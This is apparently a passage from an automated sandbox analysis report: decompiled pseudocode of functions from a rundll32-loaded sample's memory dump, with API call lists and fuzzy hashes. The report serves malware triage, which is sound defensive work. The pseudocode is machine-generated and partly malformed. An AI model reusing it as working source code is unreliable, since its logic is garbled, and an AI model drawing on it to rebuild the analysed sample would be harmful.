                                                            										_push(_t161);
                                                            										_t162 =  *_t146;
                                                            										E04640A00(_t162, _a4, _t196);
                                                            										_v28 = 2;
                                                            										_a12 = _t205 + 0xc;
                                                            										_push(_a4);
                                                            										_push(_t162);
                                                            										_t180 = _t146[1];
                                                            										E04640A00(_a4, _t146[1], _t196 + (_v32 + _t182) * 4);
                                                            										_v12 = 0xffffffff;
                                                            										_t164 =  *_t146;
                                                            										_t186 = _t182 + (_t146[1] - _t164 >> 2);
                                                            										__eflags = _t164;
                                                            										if(_t164 != 0) {
                                                            											__eflags = _t146[2] - _t164;
                                                            											L046403B0(_t146, _t180, _t186, _t196, _t164, _t146[2] - _t164 >> 2);
                                                            										}
                                                            										_t146[2] = _t196 + _a8 * 4;
                                                            										_t146[1] = _t196 + _t186 * 4;
                                                            										 *_t146 = _t196;
                                                            									}
                                                            								}
                                                            								_t86 = _v0;
                                                            								 *_t86 =  *_t146 + _v44 * 4;
                                                            								 *[fs:0x0] = _v20;
                                                            								return _t86;
                                                            							} else {
                                                            								_t142 = L04655B14(_t187, __eflags, _t148);
                                                            								_t3 = _t142 + 0x23; // 0x23
                                                            								_t167 = _t3 & 0xffffffe0;
                                                            								__eflags = _t167;
                                                            								 *((intOrPtr*)(_t167 - 4)) = _t142;
                                                            								return _t167;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: vector<T> too long
                                                            • API String ID: 0-3788999226
                                                            • Opcode ID: eec1a028044b83691f7262614492b16cf9fed5a83c69ed92f1955effe408cdf7
                                                            • Instruction ID: 8fd0f67e75b43256ac8ea68af923e86c81d385a88e57ba26b7d85d28b57149d1
                                                            • Opcode Fuzzy Hash: eec1a028044b83691f7262614492b16cf9fed5a83c69ed92f1955effe408cdf7
                                                            • Instruction Fuzzy Hash: 6A5181B1A002199FDF18CF68C891AAE77E5EB88310F14862DE919DB384E731F910CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E04669999(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                            				intOrPtr _v0;
                                                            				char _v6;
                                                            				char _v8;
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				signed int _v36;
                                                            				intOrPtr* _v64;
                                                            				intOrPtr _v96;
                                                            				intOrPtr* _v100;
                                                            				CHAR* _v104;
                                                            				signed int _v116;
                                                            				char _v290;
                                                            				signed int _v291;
                                                            				struct _WIN32_FIND_DATAA _v336;
                                                            				union _FINDEX_INFO_LEVELS _v340;
                                                            				signed int _v344;
                                                            				signed int _v348;
                                                            				intOrPtr _v440;
                                                            				intOrPtr* _t80;
                                                            				signed int _t82;
                                                            				signed int _t87;
                                                            				signed int _t91;
                                                            				signed int _t93;
                                                            				signed int _t95;
                                                            				signed int _t96;
                                                            				signed int _t100;
                                                            				signed int _t103;
                                                            				signed int _t108;
                                                            				intOrPtr _t113;
                                                            				signed char _t115;
                                                            				union _FINDEX_INFO_LEVELS _t123;
                                                            				signed int _t128;
                                                            				signed int _t131;
                                                            				void* _t137;
                                                            				void* _t139;
                                                            				signed int _t140;
                                                            				signed int _t143;
                                                            				signed int _t145;
                                                            				signed int _t147;
                                                            				signed int* _t148;
                                                            				signed int _t151;
                                                            				void* _t154;
                                                            				CHAR* _t155;
                                                            				char _t158;
                                                            				char _t160;
                                                            				intOrPtr* _t163;
                                                            				void* _t164;
                                                            				intOrPtr* _t165;
                                                            				signed int _t167;
                                                            				void* _t169;
                                                            				intOrPtr* _t170;
                                                            				signed int _t174;
                                                            				signed int _t178;
                                                            				signed int _t179;
                                                            				intOrPtr* _t184;
                                                            				void* _t193;
                                                            				intOrPtr _t194;
                                                            				signed int _t196;
                                                            				signed int _t197;
                                                            				signed int _t199;
                                                            				signed int _t200;
                                                            				signed int _t202;
                                                            				union _FINDEX_INFO_LEVELS _t203;
                                                            				signed int _t208;
                                                            				signed int _t210;
                                                            				signed int _t211;
                                                            				void* _t213;
                                                            				intOrPtr _t214;
                                                            				void* _t215;
                                                            				signed int _t219;
                                                            				void* _t221;
                                                            				signed int _t222;
                                                            				void* _t223;
                                                            				void* _t224;
                                                            				void* _t225;
                                                            				signed int _t226;
                                                            				void* _t227;
                                                            				void* _t228;
                                                            
                                                            				_t80 = _a8;
                                                            				_t224 = _t223 - 0x20;
                                                            				if(_t80 != 0) {
                                                            					_t208 = _a4;
                                                            					_t160 = 0;
                                                            					 *_t80 = 0;
                                                            					_t199 = 0;
                                                            					_t151 = 0;
                                                            					_v36 = 0;
                                                            					_v336.cAlternateFileName = 0;
                                                            					_v28 = 0;
                                                            					__eflags =  *_t208;
                                                            					if( *_t208 == 0) {
                                                            						L9:
                                                            						_v12 = _v12 & 0x00000000;
                                                            						_t82 = _t151 - _t199;
                                                            						_v8 = _t160;
                                                            						_t191 = (_t82 >> 2) + 1;
                                                            						__eflags = _t151 - _t199;
                                                            						_v16 = (_t82 >> 2) + 1;
                                                            						asm("sbb esi, esi");
                                                            						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                                                            						__eflags = _t210;
                                                            						if(_t210 != 0) {
                                                            							_t197 = _t199;
                                                            							_t158 = _t160;
                                                            							do {
                                                            								_t184 =  *_t197;
                                                            								_t17 = _t184 + 1; // 0x1
                                                            								_v8 = _t17;
                                                            								do {
                                                            									_t143 =  *_t184;
                                                            									_t184 = _t184 + 1;
                                                            									__eflags = _t143;
                                                            								} while (_t143 != 0);
                                                            								_t158 = _t158 + 1 + _t184 - _v8;
                                                            								_t197 = _t197 + 4;
                                                            								_t145 = _v12 + 1;
                                                            								_v12 = _t145;
                                                            								__eflags = _t145 - _t210;
                                                            							} while (_t145 != _t210);
                                                            							_t191 = _v16;
                                                            							_v8 = _t158;
                                                            							_t151 = _v336.cAlternateFileName;
                                                            						}
                                                            						_t211 = E04660E6E(_t191, _v8, 1);
                                                            						_t225 = _t224 + 0xc;
                                                            						__eflags = _t211;
                                                            						if(_t211 != 0) {
                                                            							_t87 = _t211 + _v16 * 4;
                                                            							_v20 = _t87;
                                                            							_t192 = _t87;
                                                            							_v16 = _t87;
                                                            							__eflags = _t199 - _t151;
                                                            							if(_t199 == _t151) {
                                                            								L23:
                                                            								_t200 = 0;
                                                            								__eflags = 0;
                                                            								 *_a8 = _t211;
                                                            								goto L24;
                                                            							} else {
                                                            								_t93 = _t211 - _t199;
                                                            								__eflags = _t93;
                                                            								_v24 = _t93;
                                                            								do {
                                                            									_t163 =  *_t199;
                                                            									_v12 = _t163 + 1;
                                                            									do {
                                                            										_t95 =  *_t163;
                                                            										_t163 = _t163 + 1;
                                                            										__eflags = _t95;
                                                            									} while (_t95 != 0);
                                                            									_t164 = _t163 - _v12;
                                                            									_t35 = _t164 + 1; // 0x1
                                                            									_t96 = _t35;
                                                            									_push(_t96);
                                                            									_v12 = _t96;
                                                            									_t100 = E0466CC4B(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                                                            									_t225 = _t225 + 0x10;
                                                            									__eflags = _t100;
                                                            									if(_t100 != 0) {
                                                            										_push(0);
                                                            										_push(0);
                                                            										_push(0);
                                                            										_push(0);
                                                            										_push(0);
                                                            										E0465EF13();
                                                            										asm("int3");
                                                            										_t221 = _t225;
                                                            										_push(_t164);
                                                            										_t165 = _v64;
                                                            										_t193 = _t165 + 1;
                                                            										do {
                                                            											_t103 =  *_t165;
                                                            											_t165 = _t165 + 1;
                                                            											__eflags = _t103;
                                                            										} while (_t103 != 0);
                                                            										_push(_t199);
                                                            										_t202 = _a8;
                                                            										_t167 = _t165 - _t193 + 1;
                                                            										_v12 = _t167;
                                                            										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                                                            										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                                                            											_push(_t151);
                                                            											_t154 = _t202 + 1 + _t167;
                                                            											_t213 = E04668535(_t167, _t154, 1);
                                                            											_t169 = _t211;
                                                            											__eflags = _t202;
                                                            											if(_t202 == 0) {
                                                            												L34:
                                                            												_push(_v12);
                                                            												_t154 = _t154 - _t202;
                                                            												_t108 = E0466CC4B(_t169, _t213 + _t202, _t154, _v0);
                                                            												_t226 = _t225 + 0x10;
                                                            												__eflags = _t108;
                                                            												if(__eflags != 0) {
                                                            													goto L37;
                                                            												} else {
                                                            													_t137 = E04669D68(_a12, __eflags, _t213);
                                                            													E046684AD(0);
                                                            													_t139 = _t137;
                                                            													goto L36;
                                                            												}
                                                            											} else {
                                                            												_push(_t202);
                                                            												_t140 = E0466CC4B(_t169, _t213, _t154, _a4);
                                                            												_t226 = _t225 + 0x10;
                                                            												__eflags = _t140;
                                                            												if(_t140 != 0) {
                                                            													L37:
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													E0465EF13();
                                                            													asm("int3");
                                                            													_push(_t221);
                                                            													_t222 = _t226;
                                                            													_t227 = _t226 - 0x150;
                                                            													_v116 =  *0x4684008 ^ _t222;
                                                            													_t170 = _v100;
                                                            													_push(_t154);
                                                            													_t155 = _v104;
                                                            													_push(_t213);
                                                            													_t214 = _v96;
                                                            													_push(_t202);
                                                            													_v440 = _t214;
                                                            													while(1) {
                                                            														__eflags = _t170 - _t155;
                                                            														if(_t170 == _t155) {
                                                            															break;
                                                            														}
                                                            														_t113 =  *_t170;
                                                            														__eflags = _t113 - 0x2f;
                                                            														if(_t113 != 0x2f) {
                                                            															__eflags = _t113 - 0x5c;
                                                            															if(_t113 != 0x5c) {
                                                            																__eflags = _t113 - 0x3a;
                                                            																if(_t113 != 0x3a) {
                                                            																	_t170 = E0466CCA0(_t155, _t170);
                                                            																	continue;
                                                            																}
                                                            															}
                                                            														}
                                                            														break;
                                                            													}
                                                            													_t194 =  *_t170;
                                                            													__eflags = _t194 - 0x3a;
                                                            													if(_t194 != 0x3a) {
                                                            														L48:
                                                            														_t203 = 0;
                                                            														__eflags = _t194 - 0x2f;
                                                            														if(_t194 == 0x2f) {
                                                            															L52:
                                                            															_t115 = 1;
                                                            															__eflags = 1;
                                                            														} else {
                                                            															__eflags = _t194 - 0x5c;
                                                            															if(_t194 == 0x5c) {
                                                            																goto L52;
                                                            															} else {
                                                            																__eflags = _t194 - 0x3a;
                                                            																if(_t194 == 0x3a) {
                                                            																	goto L52;
                                                            																} else {
                                                            																	_t115 = 0;
                                                            																}
                                                            															}
                                                            														}
                                                            														asm("sbb eax, eax");
                                                            														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                                                            														E0465DEA0(_t203,  &_v336, _t203, 0x140);
                                                            														_t228 = _t227 + 0xc;
                                                            														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                                                            														_t123 = _v340;
                                                            														__eflags = _t215 - 0xffffffff;
                                                            														if(_t215 != 0xffffffff) {
                                                            															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                            															__eflags = _t174;
                                                            															_v348 = _t174 >> 2;
                                                            															do {
                                                            																__eflags = _v336.cFileName - 0x2e;
                                                            																if(_v336.cFileName != 0x2e) {
                                                            																	L65:
                                                            																	_push(_t123);
                                                            																	_push(_v344);
                                                            																	_t123 =  &(_v336.cFileName);
                                                            																	_push(_t155);
                                                            																	_push(_t123);
                                                            																	L28();
                                                            																	_t228 = _t228 + 0x10;
                                                            																	__eflags = _t123;
                                                            																	if(_t123 != 0) {
                                                            																		goto L55;
                                                            																	} else {
                                                            																		goto L66;
                                                            																	}
                                                            																} else {
                                                            																	_t178 = _v291;
                                                            																	__eflags = _t178;
                                                            																	if(_t178 == 0) {
                                                            																		goto L66;
                                                            																	} else {
                                                            																		__eflags = _t178 - 0x2e;
                                                            																		if(_t178 != 0x2e) {
                                                            																			goto L65;
                                                            																		} else {
                                                            																			__eflags = _v290;
                                                            																			if(_v290 == 0) {
                                                            																				goto L66;
                                                            																			} else {
                                                            																				goto L65;
                                                            																			}
                                                            																		}
                                                            																	}
                                                            																}
                                                            																goto L59;
                                                            																L66:
                                                            																_t128 = FindNextFileA(_t215,  &_v336);
                                                            																__eflags = _t128;
                                                            																_t123 = _v340;
                                                            															} while (_t128 != 0);
                                                            															_t195 =  *_t123;
                                                            															_t179 = _v348;
                                                            															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                            															__eflags = _t179 - _t131;
                                                            															if(_t179 != _t131) {
                                                            																E0466C800(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E04669981);
                                                            															}
                                                            														} else {
                                                            															_push(_t123);
                                                            															_push(_t203);
                                                            															_push(_t203);
                                                            															_push(_t155);
                                                            															L28();
                                                            															L55:
                                                            															_t203 = _t123;
                                                            														}
                                                            														__eflags = _t215 - 0xffffffff;
                                                            														if(_t215 != 0xffffffff) {
                                                            															FindClose(_t215);
                                                            														}
                                                            													} else {
                                                            														__eflags = _t170 -  &(_t155[1]);
                                                            														if(_t170 ==  &(_t155[1])) {
                                                            															goto L48;
                                                            														} else {
                                                            															_push(_t214);
                                                            															_push(0);
                                                            															_push(0);
                                                            															_push(_t155);
                                                            															L28();
                                                            														}
                                                            													}
                                                            													L59:
                                                            													__eflags = _v16 ^ _t222;
                                                            													return E04655AFE(_v16 ^ _t222);
                                                            												} else {
                                                            													goto L34;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											_t139 = 0xc;
                                                            											L36:
                                                            											return _t139;
                                                            										}
                                                            									} else {
                                                            										goto L22;
                                                            									}
                                                            									goto L69;
                                                            									L22:
                                                            									_t196 = _v16;
                                                            									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                                                            									_t199 = _t199 + 4;
                                                            									_t192 = _t196 + _v12;
                                                            									_v16 = _t196 + _v12;
                                                            									__eflags = _t199 - _t151;
                                                            								} while (_t199 != _t151);
                                                            								goto L23;
                                                            							}
                                                            						} else {
                                                            							_t200 = _t199 | 0xffffffff;
                                                            							L24:
                                                            							E046684AD(0);
                                                            							goto L25;
                                                            						}
                                                            					} else {
                                                            						while(1) {
                                                            							_v8 = 0x3f2a;
                                                            							_v6 = _t160;
                                                            							_t147 = E0466CC60( *_t208,  &_v8);
                                                            							__eflags = _t147;
                                                            							if(_t147 != 0) {
                                                            								_push( &_v36);
                                                            								_push(_t147);
                                                            								_push( *_t208);
                                                            								L38();
                                                            								_t224 = _t224 + 0xc;
                                                            							} else {
                                                            								_t147 =  &_v36;
                                                            								_push(_t147);
                                                            								_push(0);
                                                            								_push(0);
                                                            								_push( *_t208);
                                                            								L28();
                                                            								_t224 = _t224 + 0x10;
                                                            							}
                                                            							_t200 = _t147;
                                                            							__eflags = _t200;
                                                            							if(_t200 != 0) {
                                                            								break;
                                                            							}
                                                            							_t208 = _t208 + 4;
                                                            							_t160 = 0;
                                                            							__eflags =  *_t208;
                                                            							if( *_t208 != 0) {
                                                            								continue;
                                                            							} else {
                                                            								_t151 = _v336.cAlternateFileName;
                                                            								_t199 = _v36;
                                                            								goto L9;
                                                            							}
                                                            							goto L69;
                                                            						}
                                                            						L25:
                                                            						E04669D43( &_v36);
                                                            						_t91 = _t200;
                                                            						goto L26;
                                                            					}
                                                            				} else {
                                                            					_t148 = E04661772();
                                                            					_t219 = 0x16;
                                                            					 *_t148 = _t219;
                                                            					E0465EEE6();
                                                            					_t91 = _t219;
                                                            					L26:
                                                            					return _t91;
                                                            				}
                                                            				L69:
                                                            			}
                                                            0x04669c05
                                                            0x04669c07
                                                            0x04669c0a
                                                            0x04669c23
                                                            0x04669c23
                                                            0x04669c25
                                                            0x04669c28
                                                            0x04669c38
                                                            0x04669c3a
                                                            0x04669c3a
                                                            0x04669c2a
                                                            0x04669c2a
                                                            0x04669c2d
                                                            0x00000000
                                                            0x04669c2f
                                                            0x04669c2f
                                                            0x04669c32
                                                            0x00000000
                                                            0x04669c34
                                                            0x04669c34
                                                            0x04669c34
                                                            0x04669c32
                                                            0x04669c2d
                                                            0x04669c48
                                                            0x04669c4c
                                                            0x04669c5a
                                                            0x04669c5f
                                                            0x04669c74
                                                            0x04669c76
                                                            0x04669c7c
                                                            0x04669c7f
                                                            0x04669cb1
                                                            0x04669cb1
                                                            0x04669cb6
                                                            0x04669cbc
                                                            0x04669cbc
                                                            0x04669cc3
                                                            0x04669cdd
                                                            0x04669cdd
                                                            0x04669cde
                                                            0x04669ce4
                                                            0x04669cea
                                                            0x04669ceb
                                                            0x04669cec
                                                            0x04669cf1
                                                            0x04669cf4
                                                            0x04669cf6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04669cc5
                                                            0x04669cc5
                                                            0x04669ccb
                                                            0x04669ccd
                                                            0x00000000
                                                            0x04669ccf
                                                            0x04669ccf
                                                            0x04669cd2
                                                            0x00000000
                                                            0x04669cd4
                                                            0x04669cd4
                                                            0x04669cdb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04669cdb
                                                            0x04669cd2
                                                            0x04669ccd
                                                            0x00000000
                                                            0x04669cf8
                                                            0x04669d00
                                                            0x04669d06
                                                            0x04669d08
                                                            0x04669d08
                                                            0x04669d10
                                                            0x04669d15
                                                            0x04669d1d
                                                            0x04669d20
                                                            0x04669d22
                                                            0x04669d36
                                                            0x04669d3b
                                                            0x04669c81
                                                            0x04669c81
                                                            0x04669c82
                                                            0x04669c83
                                                            0x04669c84
                                                            0x04669c85
                                                            0x04669c8d
                                                            0x04669c8d
                                                            0x04669c8d
                                                            0x04669c8f
                                                            0x04669c92
                                                            0x04669c95
                                                            0x04669c95
                                                            0x04669c0c
                                                            0x04669c0f
                                                            0x04669c11
                                                            0x00000000
                                                            0x04669c13
                                                            0x04669c13
                                                            0x04669c16
                                                            0x04669c17
                                                            0x04669c18
                                                            0x04669c19
                                                            0x04669c1e
                                                            0x04669c11
                                                            0x04669c9d
                                                            0x04669ca2
                                                            0x04669cad
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04669b7b
                                                            0x04669b4f
                                                            0x04669b51
                                                            0x04669bad
                                                            0x04669bb1
                                                            0x04669bb1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04669ae6
                                                            0x04669ae9
                                                            0x04669aec
                                                            0x04669aef
                                                            0x04669af2
                                                            0x04669af5
                                                            0x04669af8
                                                            0x04669af8
                                                            0x00000000
                                                            0x04669ab5
                                                            0x04669a97
                                                            0x04669a97
                                                            0x04669b03
                                                            0x04669b05
                                                            0x00000000
                                                            0x04669b0a
                                                            0x046699d9
                                                            0x046699d9
                                                            0x046699dc
                                                            0x046699e5
                                                            0x046699e8
                                                            0x046699ef
                                                            0x046699f1
                                                            0x04669a0a
                                                            0x04669a0b
                                                            0x04669a0c
                                                            0x04669a0e
                                                            0x04669a13
                                                            0x046699f3
                                                            0x046699f3
                                                            0x046699f6
                                                            0x046699f7
                                                            0x046699f9
                                                            0x046699fb
                                                            0x046699fd
                                                            0x04669a02
                                                            0x04669a02
                                                            0x04669a16
                                                            0x04669a18
                                                            0x04669a1a
                                                            0x00000000
                                                            0x00000000
                                                            0x04669a20
                                                            0x04669a23
                                                            0x04669a25
                                                            0x04669a27
                                                            0x00000000
                                                            0x04669a29
                                                            0x04669a29
                                                            0x04669a2c
                                                            0x00000000
                                                            0x04669a2c
                                                            0x00000000
                                                            0x04669a27
                                                            0x04669b0b
                                                            0x04669b0e
                                                            0x04669b13
                                                            0x00000000
                                                            0x04669b16
                                                            0x046699a9
                                                            0x046699a9
                                                            0x046699b0
                                                            0x046699b1
                                                            0x046699b3
                                                            0x046699b8
                                                            0x04669b17
                                                            0x04669b1b
                                                            0x04669b1b
                                                            0x00000000

                                                            APIs
                                                            • _free.LIBCMT ref: 04669B05
                                                              • Part of subcall function 0465EF13: IsProcessorFeaturePresent.KERNEL32(00000017,0465EEE5,00000000,00000001,00000004,00000000,00000001,00000001,?,?,0465EEF2,00000000,00000000,00000000,00000000,00000000), ref: 0465EF15
                                                              • Part of subcall function 0465EF13: GetCurrentProcess.KERNEL32(C0000417,00000001), ref: 0465EF37
                                                              • Part of subcall function 0465EF13: TerminateProcess.KERNEL32(00000000), ref: 0465EF3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                            • String ID: *?$.
                                                            • API String ID: 2667617558-3972193922
                                                            • Opcode ID: 77f52ca0845749342b5189b1e5290ed6d38713f7e75f0feb82b1dd4567dae4a6
                                                            • Instruction ID: a5608e0d041fb3c6acf9d81b13bb4c33b84cd7df805e4ad2576d7427911cb4de
                                                            • Opcode Fuzzy Hash: 77f52ca0845749342b5189b1e5290ed6d38713f7e75f0feb82b1dd4567dae4a6
                                                            • Instruction Fuzzy Hash: C251A3B5E00209AFDF14DFA9C880AAEB7F5EF58314F24816ED855E7340F671AA05CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E04639D70(void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				signed int _v9;
                                                            				struct _SECURITY_ATTRIBUTES* _v20;
                                                            				struct _SECURITY_ATTRIBUTES* _v21;
                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                            				struct _SECURITY_ATTRIBUTES* _v25;
                                                            				struct _SECURITY_ATTRIBUTES* _v28;
                                                            				struct _SECURITY_ATTRIBUTES* _v29;
                                                            				struct _SECURITY_ATTRIBUTES* _v44;
                                                            				char _v48;
                                                            				struct _SECURITY_ATTRIBUTES* _v52;
                                                            				struct _SECURITY_ATTRIBUTES* _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v61;
                                                            				struct _SECURITY_ATTRIBUTES* _v64;
                                                            				intOrPtr _v68;
                                                            				intOrPtr _v69;
                                                            				struct _SECURITY_ATTRIBUTES* _v72;
                                                            				intOrPtr _v73;
                                                            				struct _SECURITY_ATTRIBUTES* _v76;
                                                            				intOrPtr _v81;
                                                            				intOrPtr* _v92;
                                                            				char _v108;
                                                            				char _v109;
                                                            				void* _v112;
                                                            				void* _v113;
                                                            				char* _v116;
                                                            				char _v120;
                                                            				intOrPtr _v121;
                                                            				char _v124;
                                                            				signed int _t44;
                                                            				void* _t52;
                                                            				void** _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr _t72;
                                                            				signed int _t81;
                                                            				signed int _t83;
                                                            				signed int _t84;
                                                            				struct _SECURITY_ATTRIBUTES* _t57; // temporaries used below but left undeclared by the decompiler
                                                            				intOrPtr _t58;
                                                            
                                                            				_t83 = (_t81 & 0xfffffff8) - 0x7c;
                                                            				_t44 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t44 ^ _t83;
                                                            				E04637980( &_v108);
                                                            				_v68 = 0x467e048;
                                                            				_v64 = 0;
                                                            				_v60 = 0x467e024;
                                                            				_v56 = 0;
                                                            				_v20 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				_v44 = 0;
                                                            				_v76 = 0;
                                                            				_v72 = 0;
                                                            				_v52 = 0;
                                                            				_v48 = 0x43;
                                                            				E04638AE0( &_v108,  *0x46878d4 & 0x0000ffff);
                                                            				_t69 =  &_v112;
                                                            				_t84 = _t83 - 0xc;
                                                            				_push( *0x4684760 & 0x0000ffff);
                                                            				_push(0x46878d8);
                                                            				if(L04638BB0(_t69) != 0) {
                                                            					_v120 = 0x467e8b0;
                                                            					_v116 =  &_v108;
                                                            					_v52 =  &_v120;
                                                            					_t52 = CreateEventW(0, 1, 0, 0);
                                                            					_push(_t69);
                                                            					_push(0x3f);
                                                            					_v112 = _t52;
                                                            					_push(1);
                                                            					_push( &_v124);
                                                            					_v120 = 0x467ecbc;
                                                            					_v124 = 0x86;
                                                            					E04631C60(_v116);
                                                            					_t71 = _v92;
                                                            					if(_t71 != 0) {
                                                            						 *((intOrPtr*)( *_t71 + 0x14))(0xffffffff);
                                                            					}
                                                            					_t72 = _v73;
                                                            					if(_t72 != 0) {
                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x14))(0xffffffff);
                                                            					}
                                                            					_v121 = 0x467e8b0;
                                                            					CloseHandle(_v113);
                                                            					_v121 = 0x467e8c0;
                                                            				}
                                                            				E04638C90( &_v109);
                                                            				_t57 = _v29;
                                                            				if(_v29 != 0) {
                                                            					L04655B0F(_t57);
                                                            					_t84 = _t84 + 4;
                                                            				}
                                                            				_t58 = _v81;
                                                            				_v21 = 0;
                                                            				_v29 = 0;
                                                            				_v25 = 0;
                                                            				_v61 = 0x467df88;
                                                            				_v69 = 0x467e008;
                                                            				if(_v81 != 0) {
                                                            					L04655B0F(_t58);
                                                            					_t84 = _t84 + 4;
                                                            				}
                                                            				return E04655AFE(_v9 ^ _t84);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04637980: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0464B836), ref: 046379B0
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 046379C2
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 046379D5
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 046379E8
                                                            • CreateEventW.KERNEL32(00000000,00000001), ref: 04639E41
                                                            • CloseHandle.KERNEL32(0467E8B0,00000000,00000001,0000003F), ref: 04639E9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                            • String ID: C
                                                            • API String ID: 1850149996-1037565863
                                                            • Opcode ID: e62f7c020dfe6eee8d069aed1638a1df624b9a20cbd642569a0aa1e6a4511ae0
                                                            • Instruction ID: 81d41a3d2537931ce501ded8339c2228c87f2614f5f5d839169061c19aa927a8
                                                            • Opcode Fuzzy Hash: e62f7c020dfe6eee8d069aed1638a1df624b9a20cbd642569a0aa1e6a4511ae0
                                                            • Instruction Fuzzy Hash: EA4139B15083819FE310DF64C458B1BBBE4AF95719F100A1DF5A19A2E0EBB6E508CF97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 41%
                                                            			E04639820(void* __esi, void* __eflags) {
                                                            				void* _v5;
                                                            				signed int _v8;
                                                            				void* _v17;
                                                            				char _v20;
                                                            				void* _v21;
                                                            				char _v24;
                                                            				void* _v25;
                                                            				char _v28;
                                                            				char _v44;
                                                            				char _v48;
                                                            				char _v52;
                                                            				char _v56;
                                                            				void* _v57;
                                                            				intOrPtr _v60;
                                                            				char _v64;
                                                            				void* _v65;
                                                            				intOrPtr _v68;
                                                            				void* _v69;
                                                            				char _v72;
                                                            				char _v76;
                                                            				void* _v77;
                                                            				intOrPtr* _v80;
                                                            				void* _v105;
                                                            				char _v108;
                                                            				void* _v109;
                                                            				void* _v112;
                                                            				void* _v113;
                                                            				void* _v117;
                                                            				void* _v125;
                                                            				char _v128;
                                                            				signed int _t39;
                                                            				intOrPtr* _t66;
                                                            				intOrPtr _t67;
                                                            				intOrPtr* _t68;
                                                            				signed int _t77;
                                                            				signed int _t79;
                                                            				signed int _t80;
                                                            
                                                            				_t79 = (_t77 & 0xfffffff8) - 0x7c;
                                                            				_t39 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t39 ^ _t79;
                                                            				E04637980( &_v108);
                                                            				_v68 = 0x467e048;
                                                            				_v64 = 0;
                                                            				_v60 = 0x467e024;
                                                            				_v56 = 0;
                                                            				_v20 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				_v44 = 0;
                                                            				_v76 = 0;
                                                            				_v72 = 0;
                                                            				_v52 = 0;
                                                            				_v48 = 0x43;
                                                            				E04638AE0( &_v108,  *0x46878d4 & 0x0000ffff);
                                                            				_t80 = _t79 - 0xc;
                                                            				_push( *0x4684760 & 0x0000ffff);
                                                            				_push(0x46878d8);
                                                            				if(L04638BB0( &_v112) != 0) {
                                                            					E04632000( &_v128,  &_v108);
                                                            					_t66 = _v80;
                                                            					if(_t66 != 0) {
                                                            						 *((intOrPtr*)( *_t66 + 0x14))(0xffffffff);
                                                            					}
                                                            					_t67 = _v72;
                                                            					if(_t67 != 0) {
                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t67 + 4)) + 0x14))(0xffffffff);
                                                            					}
                                                            					_v128 = 0x467d858;
